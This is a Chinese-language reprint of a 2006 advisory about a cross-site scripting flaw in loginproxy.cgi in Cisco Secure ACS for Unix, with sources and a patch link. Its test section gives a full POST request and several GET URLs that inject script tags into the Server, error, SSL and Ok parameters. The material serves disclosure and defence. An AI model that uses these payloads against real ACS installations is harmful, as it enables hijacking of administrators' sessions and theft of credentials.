Cisco Secure ACS loginproxy.cgi跨站脚本执行漏…
2008-04-09 04:18:09来源:互联网 阅读 ()
发布日期:2006-06-15
更新日期:2006-06-16
受影响系统:
Cisco Secure ACS for Unix 2.3描述:
BUGTRAQ ID: 18449
Cisco Secure ACS是Cisco网络设备的中央管理平台,用于控制设备的认证和授权。
Cisco Secure ACS的loginproxy.cgi脚本中存在跨站脚本漏洞。如果用户提交了特制的GET或POST请求的话,就会导致泄漏敏感信息,如用户名和口令或在用户浏览器会话中执行任意HTML和脚本代码。
<*来源:Thomas Liam Romanis (liam.romanis@uk.fujitsu.com)
链接:http://secunia.com/advisories/20699/print/
http://seclists.org/lists/bugtraq/2006/Jun/0436.html
http://www.cisco.com/warp/public/707/cisco-sr-20060615-acs.shtml
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
POST http://10.17.12.184:80/CScgi/LogonProxy.cgi HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://10.17.12.184/cs/index.html
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Host: 10.17.12.184
Content-Length: 33
Pragma: no-cache
Server=0.0.0.0&error=<script>alert("help")</script>
2. GET请求
http://10.17.12.184/CScgi/LogonProxy.cgi?Server=0.0.0.0&error=<script>alert("help")</script>
http://10.17.12.184/CScgi/LogonProxy.cgi?Server=10.17.12.184/Logon?null&SSL=<script>alert('help')</script>
http://10.17.12.184/CScgi/LogonProxy.cgi?Ok=<script>alert('help')</script>
建议:
厂商补丁:
Cisco
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.cisco.com/pcgi-bin/tablebuild.pl/cspatchunix-3des
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
